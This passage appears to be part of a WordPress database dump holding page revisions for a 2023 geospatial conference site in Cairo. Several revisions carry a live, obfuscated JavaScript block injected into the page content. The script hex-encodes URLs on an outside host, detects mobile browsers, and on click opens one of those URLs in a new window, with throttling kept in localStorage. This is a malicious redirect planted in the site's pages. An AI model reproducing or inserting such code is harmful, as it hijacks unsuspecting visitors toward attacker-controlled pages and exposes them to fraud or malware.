g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:19:14','2022-11-08 22:19:14','',3066,'https://gsw2023.com/?p=3093',0,'revision','',0),
(3094,1,'2022-11-08 22:19:41','2022-11-08 22:19:41','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:19:41','2022-11-08 22:19:41','',3066,'https://gsw2023.com/?p=3094',0,'revision','',0),
(3095,1,'2022-11-08 22:26:56','2022-11-08 22:26:56','','m2','','inherit','open','closed','','m2-5','','','2022-11-08 22:26:56','2022-11-08 22:26:56','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/m2.jpg',0,'attachment','image/jpeg',0),
(3096,1,'2022-11-08 22:27:04','2022-11-08 22:27:04','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" icon_style=\"square\" content_font_family=\"font_family:Raleway|font_call:Raleway|variant:regular\" content_font_style=\"font-weight:normal;font-style:normal;\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 